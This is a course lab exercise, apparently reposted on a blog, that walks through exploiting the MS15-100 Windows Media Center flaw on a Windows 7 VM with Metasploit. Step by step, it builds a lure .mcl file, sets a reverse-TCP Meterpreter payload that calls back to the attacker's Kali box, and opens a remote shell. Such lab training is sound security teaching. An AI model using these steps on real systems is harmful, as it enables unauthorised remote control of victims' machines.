This activity is ungraded.
Note: This will only work on a Windows 7 target machine. It will not work on Windows 10.Software: In this activity you will use these applications and resources that are included in the Kali VM:
MetasploitMeterpreterYou’ll need a Windows 7 system. It can be your host machine, or another device altogether. If neither of those conditions are possible, you can download a free legal Windows 7 VM. In your hypervisor, you might need to add the Network Adapter before starting the VM.
Download Windows 7 VMTime: This activity should take you approximately 30 minutes to complete.
Note: Hit Enter after each command.
Before you begin: Make sure that the Windows 7 VM is running in bridged mode (in a separate VMware Hypervisor instance), and is on the same subnet as the Kali box. Turn off the Firewall on the Windows 7 system, and make sure the Windows 7 system and the Kali box can ping each other.
Inside of msfconsole, execute the following commands. Make sure you read all output: search ms15_100use exploit/windows/fileformat/ms15_100_mcl_exeinfoset filename secretjonathanvideos.mclset file_name secretjonathanvideos.exeset payload windows/meterpreter/reverse_tcpset lhost [IP ADDRESS OF YOUR KALI BOX]set lport 7777exploit Notice the output, indicating the location where this file was created, for example /root/.msf4/local/secretjonathanvideos.mcl.In addition to the file created, a handler was started on the Kali box that will wait for a callback from the target Windows 7 machine when the file is double clicked.Open up another terminal and enter cp /root/.msf4/local/secretjonathanvideos.mcl /root/Desktop. This will copy the file to your Kali desktop.Either using Guest Additions, email, or a USB drive, copy that file over to your Windows 7 machine.Double click the file in the Windows host machine, and click View Now in the security warning.In Kali, you will see a notification that a Meterpreter session has been established.Enter sessions –l to see the sessions listed.Enter sessions –i [number of the session showing in the ID column]. For example: sessions -i 1Enjoy your meterpreter shell! If you're using the free Microsoft Windows 7 VM (which is limited), some Meterpreter commands that I did in the Demo Videos will not work. If you're using your own Windows 7 copy, feel free to replicate everything I did in the demo videos! :-)After you've finished, complete the activities below. Please be as brief as you can in your responses (five words or less).
转载于:https://www.cnblogs.com/sec875/articles/10028589.html
相关资源:JAVA上百实例源码以及开源项目